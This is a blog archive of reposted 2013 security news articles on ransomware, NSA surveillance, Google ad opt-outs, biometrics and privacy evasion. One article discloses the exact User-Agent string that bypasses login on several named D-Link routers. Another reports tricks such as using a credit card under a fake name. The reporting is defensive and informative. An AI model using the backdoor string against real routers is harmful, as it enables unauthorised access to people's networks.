Monthly Archives: October 2013

Upfront security better and cheaper, says expert

Businesses can increase data protection and decrease costs by baking in information security from the start of any IT project, says Jon McCoy, founder of application security firm DigitalBodyGuard.

“Security needs to start when businesses set the goals and plan the day-to-day workflow a new IT system will accomplish,” he told Computer Weekly.

McCoy, a .Net software engineer, would like to see executives consider information security even earlier when they plan the business direction, products and infrastructure.

“A dollar spent on the planning stage can be worth ten, a hundred or even a thousand times that post deployment, which is a good business reason for investing in security early,” he said.

Security failure

Time to market is often cited as a reason security is overlooked or added only later, but McCoy points out that developing something securely from the start rarely takes any longer.

“It is usually nice to have longer for testing, but a secure infrastructure can be developed for the same cost in the same time as an insecure infrastructure,” he said.

According to McCoy, small, seemingly unimportant choices at key points in the design of an application, network or business process can have far-reaching effects on the security of the whole organisation.

A common example, he said, is to demand long, complicated, frequently-changing passwords, which can create other security issues more critical than those they are aimed at solving.

This approach to security can put users and security teams at odds and lead to users writing down passwords and finding workarounds.

“A better approach is to find a model that works for users in the real word, such as using a YubiKey device that automatically generates and rotates complex passwords for users,” said McCoy.

Security should be easy and transparent, he said, not frustrating for users by slowing them down in doing their work.

One of the most common security failures in organisations is that they try to solve each problem identified by security analysis tools, rather than looking for and solving the root causes, said McCoy.

Completely ignoring the reports generated by security analysis tools is equally problematic, he said.

Security success

On the other hand, companies that are doing security well typically conduct regular security reviews, include security at the planning stages of all IT projects, and do iterative security testing.

However, McCoy cautions against security leading organisations. “There are instances where I have seen this go very wrong because security does not have the market knowledge,” he said.

A secure infrastructure can be developed for the same cost in the same time as an insecure infrastructure

Jon McCoy, DigitalBodyGuard

McCoy said he has seen the most success where a senior executive is a proponent of security and introduces security to each of the business teams, appointing a security representative in each.

“Where security is introduced slowly in this way, it can change the culture of the organisation and stop being an external force to the point that all teams have an internal security skillset or concern,” he said.

Security training for developers

McCoy is to discuss such indicators or security success or failure and other key security issues in a free seminar on the security lifecycle at Level 39, London, on 17 October 2013.

The seminar is in collaboration with the New Developers Conference (NDC), which will hold its first .Net and agile development event in London from 4-6 December 2013 at the ExCel convention centre.

“A key takeaway for the seminar will be that introducing security as early as possible into the development lifecycle will deliver big returns,” said McCoy.

He believes that by reducing the gulf that exists between the security community and developers, businesses will reap rewards in terms of improved data protection.

“Training developers in basic security can have a huge impact because while security experts come and go, developers are the people who construct systems day to day and are always there,” he said.


Via: computerweekly

CryptoLocker ransomware – see how it works, learn about prevention, cleanup and recovery

This article explains how the CryptoLocker ransomware works, including a short video showing it in action.

The article tells you about prevention, cleanup, and recovery.

It also explains how to improve your security against this sort of threat in future.


CryptoLocker, detected by Sophos as Troj/Ransom-ACP, is a malicious program known as ransomware.

Some ransomware just freezes your computer and asks you to pay a fee. (These threats can usually be unlocked without paying up, using a decent anti-virus program as a recovery tool.)

CryptoLocker is different: your computer and software keep on working, but your personal files, such as documents, spreadsheets and images, are encrypted.

The criminals retain the only copy of the decryption key on their server – it is not saved on your computer, so you cannot unlock your files without their assistance.

They then give you a short time (e.g. 72 hours, or three days) to pay them for the key.

The decryption key is unique to your computer, so you can’t just take someone else’s key to unscramble your files.

The fee is $300 or EUR300, paid by MoneyPak; or BTC2 (two Bitcoins, currently about $280).

To understand how CryptoLocker goes about its dirty work, please see our step-by-step description.

→ Our detailed article is suitable for non-technical readers. It covers: how the malware “calls home” to the crooks, how the encryption is done, which file types get scrambled, and what you see when the demand appears. You may want to keep the article open in another tab or window to refer to while you read this page.


CryptoLocker reveals itself only after it has scrambled your files, which it does only if it is online and has already identified you and your computer to the encryption server run by the criminals.

We therefore recommend that you don’t try the malware out yourself, even if you have a sample and a computer you don’t care about, because you can’t easily test it without letting your computer converse with the crooks.

However, we know you would love to see what it does and how it works, so here is a video made by a our friend and colleague Mark Rickus, of Sophos Support.

We recommend this video because Mark has pitched it perfectly: he doesn’t rush; he doesn’t talk down to you; he lets the facts speak for themselves; and he brings an air of calm authority with just a touch of wry humour to what is a rather serious subject:

→ Can’t see the details in the video on this page? Watch directly from YouTube.


You can use the free Sophos Virus Removal Tool (VRT).

This program isn’t a replacement for your existing security software, because it doesn’t provide active protection (also known as on-access or real-time scanning), but that means it can co-exist with any active software you already have installed.

The Virus Removal Tool will load, update itself, and scan memory, in case you have malware that is already active.

Once it has checked for running malware, and got rid of it, then it scans your hard disk.

If it finds any malicious files, you can click a button to clean them up.

If CryptoLocker is running and has already popped up its payment demand page, you can still remove it and clean up, but the Virus Removal Tool cannot decrypt your scrambled files – the contents are unrecoverable without the key, so you may as well delete them.

Even if you don’t have CryptoLocker, it is well worth scanning your computer for malware.

The criminals are known to be using existing malware infections as “backdoors” to copy CryptoLocker onto victims’ computers.

We assume their reasoning is that if you have existing, older malware that you haven’t spotted yet, you probably won’t spot CryptoLocker either, and you probably won’t have backup – and that means they’re more likely to be able to squeeze you for money later on.


Fortunately, CryptoLocker is not a virus (self-replicating malware), so it doesn’t spread across your network by itself.

But it can affect your network, because it searches extensively for files to encrypt.

Remember that malware generally runs with the same permissions and powers as any program you choose to launch deliberately.

So, any file, on any drive letter or network share, that you can locate and access with a program such as Windows Explorer can be located and accessed by CryptoLocker.

That includes USB drives, network file shares, and even cloud storage folders that are made to appear as a drive letters by special software drivers.

A Naked Security reader just commented that from a single infected computer, he was “faced with 14,786 encrypted files over local and mapped network drives.”

So, if you haven’t reviewed the security settings on your network shares lately, this would be a good time to do so.

If you don’t need write access, make files and folders read only.


We’ll follow the police’s advice here, and recommend that you do not pay up.

This sort of extortion – Demanding Money with Menaces, as a court would call it – is a serious crime.

Even though CryptoLocker uses payment methods (MoneyPak, Bitcoin) that keep you and the crooks at arm’s length, you are dealing with outright criminals here.

Of course, since we don’t have 14,786 encrypted files, like the reader we mentioned above, we acknowledge that it may be easier for us to say, “Don’t pay” than it is for you to give up on your data.

Obviously, we can’t advise you on how likely it is that you will get your data back if you do decide to pay.


We don’t think so, although that is cold comfort to those who have lost data this time round.

Losing files completely is a terrible blow, but you can lose data in lots of other ways: a dropped hard disk, a stolen laptop or just plain old electronic failure.

The silver lining with CryptoLocker is that the criminals don’t actually take your data – they just leave it locked up where it was before, and offer to sell you the key.

In many ways, malware that isn’t so obvious and agressive, but which steals your files, or monitors your keyboard while you login to your bank, or takes snapshots of your screen while you’re filling out your tax return, can be much worse.

In those cases, the crooks end up with their own duplicate copies of your data, passwords and digital identity.

If you have a recent backup, you can recover from CryptoLocker with almost no consequences except the time lost restoring your files.

Identity theft, however, can be a lot harder to recover from – not least because you have to realise that it’s even happened before you can react.

Even if all you have on your computer is zombie malware of the sort that crooks use to send spam, doing nothing about it hurts everyone around you, and imposes a collective cost on all of us.

That’s why we are urging you to DO THESE 3 security steps, and TRY THESE 4 free tools, even if you haven’t been hit by CryptoLocker.


Here are five “top tips” for keeping safe against malware in general, and cyberblackmailers in particular:

  • Keep regular backups of your important files. If you can, store your backups offline, for example in a safe-deposit box, where they can’t be affected in the event of an attack on your active files. Your backups will be rendered useless if they are scrambled by CryptoLocker along with the primary copies of the files.
  • Use an anti-virus, and keep it up to date. As far as we can see, many of the current victims of CryptoLocker were already infected with malware that they could have removed some time ago, thus preventing not only the CryptoLocker attack, but also any of the damage done by that earlier malware.
  • Keep your operating system and software up to date with patches. This lessens the chance of malware sneaking onto your computer unnoticed through security holes. The CryptoLocker authors didn’t need to use fancy intrusion techniques in their malware because they used other malware, that had already broken in, to open the door for them.
  • Review the access control settings on any network shares you have, whether at home or at work. Don’t grant yourself or anyone else write access to files that you only need to read. Don’t grant yourself any access at all to files that you don’t need to see – that stops malware seeing and stealing them, too.
  • Don’t give administrative privileges to your user accounts. Privileged accounts can “reach out” much further and more destructively both on your own hard disk and across the network. Malware that runs as administrator can do much more damage, and be much harder to get rid of, than malware running as a regular user.


Via: sophos

On Macs, Cross-Platform Threats, and Managing Multiple Devices

Apple will once again take center stage on October 22, when they (probably) unveil new versions of the iPad, iPad mini, MacBook Pro, and the Mac Pro. We will be once again on the lookout for scams and malware that will exploit this event, as they did with the iPhone 5s.

The threats mentioned above also reiterate what we’ve said before: Mac users are not immune to cybercrime. In today’s landscape where information can be accessed practically anywhere, threats to data are no longer dependent on the type of device or operating system one is using.

One example is the continued—and even growing—exploitation of vulnerabilities found in cross-platform applications like Adobe or Java, which had several bouts of zero-day incidents during the first quarter of this year. For end users who have access to both a PC and a Mac, protecting themselves from these exploits would mean, at the very least, installing security updates for each of these platforms once it becomes available.

For enterprises, this task is compounded ten- or even hundred-fold, especially because they have to manage not just PCs and Macs, but also Android, iOS, and other endpoints that connect to their networks. With consumerization and bring-your-own device trends happening, the endpoint “ecosystem” is getting fragmented further.

This mixed bag of devices and OSes can pose several challenges for IT administrators. Controlling these devices and maintaining visibility over events is more difficult. Again, we are not just talking about PC and Mac threats here: our researchers have so far uncovered threats that affect
both desktops and mobile, too.

Another challenge is the deployment of preventive measures like patches and security updates. As such, organizations should have an endpoint strategy that is composed of not only the appropriate solutions and technologies, but also of a well-thought out data security policies. More information about the can be found in our latest Security In Context Primer: Managing Multiple Devices: Integrated Defense Against Cross-Platform Threats.


Via: trendmicro

How to remove your face from Google’s upcoming Shared Endorsement ads

Some Google users who don’t want their faces used to pimp bagel shops (or spas, or Nexus 7, or whatever ads Google can squeeze money out of) are replacing their photos with one of Executive Chairman Eric Schmidt.

The backlash – the scope of which could be tiny, for all I know, given that news of it apparently comes solely from a retweet by Daring Fireball’s John Gruber – apparently is in reaction to Google’s announcement to grab user’s profile pictures, names, photos and product reviews as harvested from Google+ and plug them into advertisements.

Google is calling the planned advertisements Shared Endorsements.

Google announced new Terms of Service that will go live on 11 November which explain that it will use content in this way.

On top of our images, Google will also display reviews of restaurants, shops and products, as well as songs and other content reviewed or bought on the Google Play store, when our friends and connections search on Google.

Of course, the move is a no-brainer for Google.

The company’s revenues come almost entirely – reportedly 96% in 2012, and at 97% in 2011 – on ad revenue.

Google doesn’t make any bones about it. The company said in an annual report from 2012, “We generate revenue primarily by delivering relevant, cost-effective online advertising.”

The move is identical to Facebook’s Sponsored Stories boondoggle, with one exception: It’s looking to not be a boondoggle. Google is doing it right.

Namely, Google is offering users a way to opt out, and that will in all likelihood sidestep the legal swamp that Facebook fell into over Sponsored Stories.

For its part, Facebook paid out $20 million in a personal ads class action lawsuit settlement in August 2013, and another $10 million to settle a lawsuit in 2012.

Antagonising Google by swapping a profile photo for Schmidt’s may feel like fun, in-your-FACE-Google! hijinks, but the chances that Google will roll back the tasty revenue source are approximately, in rounded percentage points, “hahahahahaha!”

It’s likely that the only way to opt out is to opt out.

Here’s how to opt out of Google’s Shared Endorsements:

  1. Sign into your Google account. If you’re in the process of setting up an account, finish that first, then come back.
  2. Go to the Shared Endorsements setting page. If you’re not already a Google+ user, you will be asked to upgrade your account.
  3. Toward the bottom, you’ll see a checkbox that says “Based on my activity, Google may show my name and profile photo in shared endorsements that appear in ads.”
  4. Uncheck it and click Save to opt out of the new program.

Google will grab at your ankle to try to drag you back into advertising land, but one extra click saying “Yes, I do, in fact, want to unpeel my mug from your advertisements” won’t kill us, I suppose.

 Many readers have asked if this will impact users with Google Accounts who haven’t enabled Google Plus. Are they already opted out or do they have to climb further into bed with Google and enable Google Plus account just to opt out? Google’s information is ambiguous on this point.


Via: nakedsecurity

Think You Can Live Offline Without Being Tracked? Here’s What It Takes

We asked the most privacy-aware people we could find what it would take to go off the radar. Hint: You’re going to need to do more than throw away your laptop.


Nico Sell, the cofounder of a secure communication app called Wickr, has appeared on television twice. Both times, she wore sunglasses to prevent viewers from getting a full picture of what she looks like.

Sell, also an organizer of the hacker conference Def Con, places herself in the top 1% of the “super paranoid.” She doesn’t have a Facebook account. She keeps the device that pays her tolls in a transmission-proof envelope when it’s not in use. And she assumes that every phone call she makes and every email she sends will be searchable by the general public at some point in the future.

Many of her friends once considered her habits to be of the tin-foil-hat-wearing variety. But with this summer’s revelations of the NSA’s broad surveillance program, they’re starting to look a little more logical. “For the last couple of months,” Sell says, “My friends that are not in the security industry come up to me, and I hear this all the time, ‘You were right.’ ”

But even as more people become aware they are being tracked throughout their daily lives, few understand to what extent. In a recent Pew Internet study, 37% of respondents said they thought it was possible to be completely anonymous online. From experts like Sell, you’ll get a different range of answers about whether it’s possible to live without any data trail: “100% no,” she says.

The people who have actually attempted to live without being tracked–most often due to a safety threat–will tell you that security cameras are just about everywhere, RFID tags seem to be in everything, and almost any movement results in becoming part of a database. “It’s basically impossible for you and I to decide, as of tomorrow, I’m going to remain off the radar and to survive for a month or 12 months,” says Gunter Ollmann, the CTO of security firm IOActive, who in his former work with law enforcement had several coworkers who dedicated themselves to remaining anonymous for the safety of their families. “The amount of prep work you have to do in order to stay off the radar involves years of investment leading up to that.”

Fast Company interviewed the most tracking-conscious people we could find about their strategies for staying anonymous to different degrees. Here are just a handful of daily, offline tasks that get more complicated if you’re avoiding surveillance.

1. Getting Places

A few years ago, a man who goes by the Internet handle “Puking Monkey” noticed devices reading his toll pass in places where there weren’t any tolls. He assumed that they were being used to track drivers’ movements. “People would say, ‘Well you don’t know that, because it doesn’t tell you when it tracks you,'” he tells Fast Company. “I said, ‘Okay, I’ll go prove it.’ ”

He rigged his pass to make a mooing cow noise every time a device read his toll payment tag. And sure enough, it went off in front of Macy’s, near Time Square, and in several other places where there was no tollbooth in sight.

It turns out the city tracks toll passes in order to obtain real-time traffic information, a benign enough intention. But what worries people like Puking Monkey about being tracked is rarely a database’s intended purpose. It’s that someone with access to the database will misuse it, like when NSA employees have spied on love interests, A U.K. immigration officer once put his wife on a list of terrorist suspects in order to prevent her from flying into the country. Or that it will be used for a purpose other than one it was built for, like when social security numbers were issued for retirement savings and then expanded to become universal identifiers. Or, most likely, that it will be stolen, like the many times a hacker group called Anonymous gains access to someone’s personal data and posts it online for public viewing. By one security company’s count, in 2012 there were 2,644 reported data breeches involving 267 million records.

In order to stop his toll pass from being tracked, Puking Monkey keeps it sealed in the foil bag it came in when he’s not driving through a toll. That only stops that data trail (minus toll points). Automatic license plate readers, often mounted to a police car or street sign, are also logging data about where cars appear. They typically take photos of every license plate that passes them and often these photos remain stored in a database for years. Sometimes they are linked with other databases to help solve crimes.

Puking Monkey avoids license-plate readers by keeping his old, non-reflective license plate, which is more difficult to read than newer, reflective models. Others who share his concerns salt their license plates, add bumper guards or otherwise obscure the writing–say by driving with the hatch down or driving with a trailer hatch attached—in order to avoid being tracked.

But that still doesn’t account for the tracking devices attached to the car itself. To identify tires, which can come in handy if they’re recalled, tire manufacturers insert an RFID tag with a unique code that can be read from about 20 feet away by an RFID reader. “I have no way to know if it’s actually being tracked, but there are unique numbers in those tires that could be used that way,” Puking Monkey says.

He uses a camera flash to zap his tires with enough energy to destroy the chips.

2. Buying things

Depending on your level of concern, there are several ways to produce less data exhaust when making purchases. None of the privacy experts who I spoke with sign up for loyalty cards, for instance. “It’s the link between your home address, what you’re purchasing, age, your movements around the country, when you’re shopping in different locations, that is tied to purchases you’re making in-store,” Ollmann says. In a recently publicized example, Target used data collected from loyalty cards to deduce when its customers were pregnant–in some cases, before they had shared the news with their families.

Tom Ritter, a principal security consultant at iSEC Partners, has come up with a creative way to subvert loyalty tracking without giving up discounts. When he sees someone has a card on their key chain, he asks if he can take a photo of the bar code to use with his own purchases. They get extra points, and he gets discounts without giving up any of his privacy.

What you buy can paint a pretty good picture of what you’re doing, and many people aren’t willing to leave that information in a credit card company’s database either. Adam Havey, an artist who makes anti-surveillance gear, puts all of his purchases on a credit card registered under a fake name. Then he uses the credit card in his actual name to pay the bill (Update: Harvey clarified that this is a technique he heard about from Julia Angwin, who is writing a book about surveillance). Ollmann buys prepaid gift cards with no attribution back to him to do his online shopping.

The most intense privacy seekers have a strict cash-only policy–which can mean they need to get paid in cash. At Ollmann’s old law enforcement job, one employee didn’t get paid, but vaguely “traded his services for other services.”

“A barter system starts to appear if you want to live without being tracked,” Ollmann says.

3. Having Friends

Friends can be an impediment to a life off the radar. For one, they probably think they’re doing you a favor when they invite you to a party using Evite, add you to LinkedIn or Facebook, or keep your information in a contact book that they sync with their computer.

But from your perspective, as someone trying to remain as untraceable as possible, they are selling you out. “Basically what they’ve done is uploaded all of my contact information and connected it to them,” Sell says.

Same goes for photos, and their geolocation metadata, when they’re added to social networking sites. Sell, with her sunglasses, is not alone in being concerned about putting her appearance online. At some security events, where there are often speakers and attendees with reasons to keep off the radar, organizers distribute name tags with different color stickers. The stickers indicate whether each attendee is okay with having his or her photo taken.

Sure, it seems paranoid today. But Facebook and Twitter already run photos posted on their sites through a Microsoft-developed system called PhotoDNA in order to flag those who match known child pornography images. Most would not argue with the intention to find and prosecute child pornographers, though it’s not difficult for privacy activists to imagine how the same technology could be expanded to other crimes. “Every time you upload a photograph to Facebook or put one on Twitter for that matter you are now ratting out anybody in that frame to any police agency in the world that’s looking for them,” digital privacy advocate Eben Moglen told BetaBeat last year during a rant against one of its reporters. “Some police agencies in the world are evil. That’s a pretty serious thing you’ve just done.”

Ritter says he (not his company) personally thinks someone will build a facial recognition algorithm to scan the Internet within the next 10 years. “I can just imagine them opening it up where you would submit a Facebook photo of your friend, and it would show all the images that match it,” he says. “We have the algorithms, we know how to crawl the Internet. It’s just a matter of putting the two together and getting a budget.”

4. Just About Everything Else

It’s almost impossible to think of all the data you create on a daily basis. Even something as simple as using electricity is creating data about your habits. It’s more than whether or not you turned the lights on–it’s how many people are in your house and when you’re usually around.

RFID tags aren’t just in tires, they’re in your clothing, your tap-to-pay credit cards, and your dry cleaning. Ollmann zaps his T-shirts in the microwave. Others carry an RFID-blocking wallet to avoid having their RFID-enabled cards read when they’re not making a purchase.

Maybe you’ve thought about the cameras that stores use to track customer movements. But cameras are also in your television, in your computer, and on the front of your phone. Earlier this year, security experts discovered a way to hack into Samsung Smart TVs and surreptitiously turn on the built-in camera, allowing anyone who exploited the security hole to watch you as you watched TV. Though the vulnerability has since been fixed, it demonstrated that the security of connected objects isn’t guaranteed. Sell responded by covering all of the cameras in her household electronics with masking tape.

What makes totally avoiding surveillance really difficult is that even if you’ve thought of everything–to the point where you’re covering your tablet’s front-facing camera with masking tape–you can always think of more ways your data could be misused. Because you’re constantly trying to prevent something that hasn’t necessarily happened yet, the precautions you can take are just as endless.

Sometimes, as in the case of the NSA scandal, you find out that they were warranted. Most of the time, you never really know.

Ritter, for instance, recently met an insurance executive who always pays for meals with cash because he believes some day that data will be linked to his coverage. “I’m not saying this is a definite thing that happens,” Ritter says. “but I don’t see any definite reason why it couldn’t.”

“And that kind of concerns me, ya know?”

Via: fastcompany

To Get Around US Law, The NSA Collects Email Address Books And Chat Buddy Lists From Foreign Locations

The Washington Post broke news this afternoon that the National Security Agency (NSA) is collecting huge numbers of email address books and chat buddy lists for both foreign individuals and United States citizens.

It appears that the NSA lacks Congressional authority to collect buddy lists and address book information in the way that it currently does. As the Post rightly points out, address book data can include physical addresses, very personal information, and more.

To get around that lack of a mandate, the NSA has agreements with non-U.S. telcos and works with other, non-U.S. intelligence groups. So to get its hands on even more information, the NSA avoids the constraints of its provided oversight and legal boundaries, by going to alternative sources of the data that it wants.

That matters because the rules of other countries for tracking the communication of United States citizens are more lax. Recall that the NSA is in some ways slowed from collecting information on citizens of the United States, but not those of other countries.

So, if the NSA is willing to accept data from foreign intelligence agencies that it is not able to collect in this case, why not in other cases as well?

If the NSA won’t respect the constraints that are put in place on its actions for a reason, and will instead shirk its responsibilities and find a way to get all the data it could ever desire, then we have even less reason to trust its constant petitions that it follows the law, and is the only thing keeping the United States safe from conflagration.

The Post continues: “When information passes through ‘the overseas collection apparatus,’ [an intelligence office] added, ‘the assumption is you’re not a U.S. person.'” This means that when the NSA sweeps up contact data, buddy lists, and address sets from overseas, the same rules that keep it from collecting information on United States citizens aren’t likely in play. Minimization, it would seem, would be minimal.

The phone metadata program knows who you called, when, and for how long. PRISM can force your private information out of major Internet companies. XKeyscore can read your email, and tracks most of what you do online. And the above program circumvents Congressional oversight by collecting more data on U.S. citizens by merely executing that collection abroad.

How private are you feeling?

Facebook provided TechCrunch with the following statement:

“As we have said many times, we believe that while governments have an important responsibility to keep people safe, it is possible to do so while also being transparent. We strongly encourage all governments to provide greater transparency about their efforts aimed at keeping the public safe, and we will continue to be aggressive advocates for greater disclosure.”

Microsoft repeated to TechCrunch what it had told the Washington Post, that it “does not provide any government with direct or unfettered access to our customers’ data” and that if the above revelations are true, then the company would “have significant concerns.”


Via: techcrunch

D-Link router flaw lets anyone login through “Joel’s Backdoor”

Members of the embedded systems hacker collective /dev/ttys0 spend their time playing around with devices like home routers and set-top boxes.

They like to see what interesting facts these devices’ proprietary hardware and firmware might reveal.

Part of the hackers’ motivation is to get the devices to do things that the vendor may not have bothered to implement, thus improving their functionality.

And why not, if it’s your device that you bought outright with your own money?

But hacking on embedded systems can also help to improve security, or at least help others to avoid insecurity, by revealing and helping to fix potentially exploitable vulnerabilities that might otherwise lie dormant for years.

Indeed, in recent times, we’ve written repeatedly about security problems in consumer embedded devices.

We had a botnet that unlawfully mapped the internet by jumping around from router to router and taking measurements without permission.

We described a flaw that allowed attackers to force your router to open up its administration interface to the internet, something you would never normally do.

We’ve talked about how the Wi-Fi Protected Setup (WPS) feature, intended to improve security, typically makes your wireless access point easier to break into.

And we wrote up a widepsread flaw in the way that many routers implement a popular system known as Universal Plug and Play (UPnP).

UPnP is a protocol that is supposed to make it easier to configure your system correctly, but may instead leave you open to the world.

You can probably guess where this is going: another security hole.

This one was found in the firmware of a number of D-Link routers – the author suggests at least the models DIR-100, DI-524, DI-524UP, DI-604S, DI-604UP, DI-604+ and TM-G5240.

I’ll skip the details – you should read the original author’s analysis, since he did the hard yards to identify the flaw – and cut to the almost unbelievable conclusion.

If you browse to any page on the administration interface with your browser’s User Agent (UA) string set to a peculiar, hard-wired value, the router doesn’t bother to ask for a password.

→ Browsers send a User Agent string in the headers of every HTTP request. This is a handy, if clumsy, way to help web servers cater to the programmatic peccadillos of each browser.

Let’s be perfectly clear what this means: these routers have a hardwired master key that lets anyone in through an unsupervised back door.

“What is this string,” I hear you ask?

You will laugh: it is xmlset_roodkcableoj28840ybtide.


Ignore the xmlset, which probably just means “Configure Extensible Markup Language (XML) setting.”

Flip round the part after the underscore, in reversible-rock-music style, to get the hidden message:

Edit by 04882 Joel: Backdoor.

Can you believe it?

If you tell your browser to identify itself as Joel’s backdoor, instead of (say) as Mozilla/5.0 AppleWebKit/536.30.1 Version/6.0.5, you’re in without authentication.

Fortunately, the administration interface isn’t accessible from the internet-facing port of these routers by default, which limits the exploitablity of this vulnerability.

(If you have one of these models, check right now that you can’t access the management interface directly from the outside!)

This is a shabby feature to put in any product, let alone in a router than aims to provide at least some additional security.

It begs the question, “Why have Joel’s code there at all?”

A good guess is that the backdoor probably wasn’t put there to enable illicit surveillance, or for any other nefarious purpose, but as a favour to special-purpose D-Link software, so it could make configuration tweaks without needing a password.

Or it was put in to save time in development and debugging, but never taken out again.

Sadly for the world, though, 04882
Joel made it easy for anyone at all to make configuration tweaks without needing a password.

For the second time this year, we’d therefore like to say, “Hardwired passwords were a design blunder back in the 1970s. In the 2010s, they are simply unacceptable, so never succumb to the temptation to include them in your code.”


Via: sophos

Android Fingerprint Sensors Coming Soon

A coming web standard being pursued by the FIDO Alliance seeks to enable much wider use of biometric sensors to access accounts. FIDO should reduce, if not eliminate all together, the use of passwords to access accounts on mobile devices. The initial FIDO-equipped Android devices are on track to roll out in early 2014.


Michael Barrett cringes every time he has to enter a password on his smartphone. But six months from now, Barrett says, he will be able to choose from the latest Android models that will come equipped with a biometric sensor capable of letting him swipe his fingerprint to access a wide range of his online accounts.

That’s the scenario being proactively pursued by the FIDO Alliance, a group of 48 tech companies, led by PayPal and Lenovo, hustling to implement a milestone technical standard.

“The intention of FIDO is absolutely that it will allow consumers to have access to mobile services that they can use with very low friction, while keeping good security ,” says Barrett, president of the FIDO Alliance. “That’s explicitly what we want to build.”

As FIDO gains traction, it should radically change mobile computing, much as the Wi-Fi standard did.

FIDO should reduce, if not eliminate all together, the use of passwords to access accounts on mobile devices.

Apple’s latest iPhone model features a much-ballyhooed fingerprint sensor, called Touch ID, that can be used to lock and unlock the phone, as well as authenticate the user to purchase digital media on iTunes.

Touch ID is not FIDO compliant.

Apple spokeswoman Natalie Kerris declined to comment.

However, Barrett says Touch ID could easily be adapted to FIDO. “Our view is that it’s possible Apple might choose to start using FIDO, but that’s probably a couple of years out.”

Meanwhile, Barrett is on a mission to get other hardware makers and online companies to arrive at a consensus on common rules of the road for enabling consumers to use their computing devices — be it a smartphone, touch tablet , laptop or desktop PC — more centrally in the authentication process.

Biometric sensing technology is well understood. Yet, passwords — and poor password habits — remain central to accessing online accounts. This has made it all too easy for cybercriminals.

“We make tradeoffs to balance security with convenience,” says Manoj Nair, general manager of identity trust management at RSA.

“The next generation of identity protection will allow us to be more convenient and secure at the same time,” Nair says.

That’s where FIDO comes in. The alliance is hashing out an open standard that any company can adopt. So a music service or online banking site will be able to recognize the unique characteristics stored on a PC’s security chip or a smartphone’s biometric sensor, as long as all parties adhere to FIDO.

The alliance officially launched in February with a handful of founders and has grown rapidly.

The initial FIDO-equipped Android devices, along with an array of commercial services using the FIDO protocols, are on track to roll out in early 2014, Barrett says.

Via: enterprise-security-today

Skype under investigation over link to NSA

Internet-based calling service Skype is under investigation by Luxembourg’s data protection authorities over its involvement with the US National Security Agency’s Prism internet surveillance programme.

The Microsoft-owned company could potentially face criminal and administrative sanctions, including a ban on passing users’ communications covertly to the NSA, according to the Guardian.

Luxembourg’s data protection chief Gerard Lommel and Microsoft have both declined to comment, the paper said.

Skype is headquartered in Luxembourg and could face an additional fine if an investigation initiated by data protection authorities concludes that the data sharing violated the country’s data-protection laws.

The investigation was ordered after whistleblower Edward Snowden’s revelations about the Prism programme uncovered links between the NSA and Skype.

Documents leaked by Snowden indicate that the amount of Skype video call information to the NSA trebled since Microsoft’s acquisition of the company in a $8.5bn deal in 2011.

In a statement to the Guardian, Skype said it believed that the world needed “a more open and public discussion” about the balance between privacy and security, but accused the US government of stifling the conversation.

“Microsoft believes the US constitution guarantees our freedom to share more information with the public, yet the government is stopping us,” a spokesperson for Skype said, referring to Microsoft’s legal battle to disclose more information about the number of government surveillance requests it receives.

Richard Anstey, CTO for Europe at business collaboration firm Intralinks said Prism is not exclusively a US problem.

“Even if companies were more paranoid about sharing information with US-based companies and opted for Germany, for example, the US government could still access it nine times out of ten,” he said.

Governments need to evaluate the criticality of data, said Anstey, and not collect information just in case they need it and not enforce their powers to do so unless it is an emergency situation.

“Businesses also need to be educated on calculating risk outcomes, from operational and commercial perspectives,” he said.

According to Anstey, there is no 0% risk option, and government surveillance is just one piece of a larger jigsaw.

“If we consider accidental disclosure of information through human error, for example, the Prism issue is starting to look relatively palatable.

“Human error can cause huge fines from the authorities and public reputation damage – it can easily occur and have a severe impact on future information sharing,” he said.

Via: computerweekly

How To Opt Out Of Google’s Weird New Ads That Use Your Face And Name

Angry that Google is planning on using your face and name for the sake of advertisements?

Here’s how to make them not.

If there’s any upside, it’s that opting out is, quite seriously, two clicks away. Two clicks that I only discovered because I went out of my way to look and because I checked the depths of Google+ (lol). But hey — it’s two clicks from somewhere.

Here’s how to do it

  1. Click this link. (And, if necessary, log in to the Googles. I promise that’s a link to actual Google, not fake Google that steals your password and uses it to order handbags.)
  2. Uncheck the checkbox. Unless it’s already unchecked — in which case, leave it unchecked. Oddly, some people are saying they’re opted out by default; others say they find it checked. tl;dr: check = bad.
  3. Hit save!

And you’re done*.

[* Until there’s another TOS change, in which case, get ready for another rousing game of find the checkbox!]

Via: techcrunch